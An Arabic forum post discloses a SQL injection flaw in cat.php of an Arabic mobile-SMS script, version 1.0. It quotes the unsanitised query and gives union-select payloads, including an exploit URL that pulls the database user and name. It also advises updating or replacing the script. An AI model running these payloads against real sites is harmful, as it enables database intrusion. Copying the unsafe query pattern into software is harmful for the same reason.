ثــغرة في سكربت الجوال العربي الاصدار 1.0 / الكل يحدث النسخة

السلام عليـكم ..

الامــس وانا عم بطور في موقع وافحص في سكربتاته ..

دخلت ملف من داخل سكربت الجوال ..

قرأت السورس تبعه .. وجدت فيه ثغرة حقن

الملف المصاب

رمز PHP:

/cat.php


لو دخلت السورس لملف السكربت

السطر 40 :
راح تجد :
رمز PHP:

$Sql = "select * from sms where Hidden!=1 and SCat=$CatID order by SID DESC LIMIT $From,$PageNO";


كما نلاحظ طلب من القاعدة متغير والمبرمج نسي يحمي الطلب ..




الان الثغرة واضحة قدامنا .. تتاكد من الثغرة ؟

طيب بلش اطلب ال sql من القاعدة ..

نختار رقم مش موجود بالقاعدة
-1 ومن ثم نبدا بالاستثمار
رمز PHP:

/**/union/**/select/**/0,/*


ومن تبدا بأضافة ارقام الى ان يذهب الخطا من الصفحة ..

شكل الخطا يكون
رمز PHP:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in


اذا ذهب من الصفحة .. تضف طلب اظهار اسم القاعدة واسم المستخدم ..

رمز PHP:

/cat.php?CatID=-1/**/union/**/select/**/0,1,2,3,USER(),DATA****()/*


تاكد من كل الصفحة اذا تغير شي فيها .. يبقى الثغرة شغاله ... ويا ويلك وشو تسوي http://www.dzbatna.com/images/smilies/crazy.gif

احذف السكربت http://www.dzbatna.com/images/smilies/shiny01.gif

هههه لا شوف الاصدار الي يليه ممكن يكون غير مصاب او جيب سكربت بديل http://www.dzbatna.com/images/smilies/no.gif

وبما
انه معروف انه ال sql لغة معقدة ..

الي يبي يفحص موقعه اذا سكربت الجوال الي مركبه مصاب ولا لا يراجعني على البريد

او الدعم الفني لشركة كل العرب ..

http://host4vb.com

دمتم بود




https://fbcdn-sphotos-d-a.akamaihd.n...93518507_n.png
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى©